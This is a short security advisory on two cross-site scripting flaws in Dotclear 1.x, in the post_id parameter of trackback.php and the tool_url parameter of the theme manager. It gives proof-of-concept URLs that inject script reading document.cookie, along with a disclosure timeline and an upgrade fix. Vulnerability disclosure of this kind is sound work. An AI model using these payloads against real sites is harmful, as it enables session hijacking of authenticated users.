Dotclear 1.* Cross Site Scripting Vulnerability
1–two cross site scripting vulnerabilities have been discovered in the
dotclear1.* allowing a remote attackers to hijack authenticated session
Workaround:
$post_id (trackback.php)
$tool_url(/tools/thememng/index.php)
are not filtered
2-Proof of Concepts:
dotclear/ecrire/trackback.php?post_id="><script>alert(document.cookie
);</script>
/ecrire/tools.php?tool_url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&p=thememng
3-Disclosure timeline
05/04/2007 dotclear team contacted
10/04/2007 fixed
4-solution:
upgrade to dotclear 1.2.6
http://www.dotclear.net/
found by nassim
http://www.securlabs.com/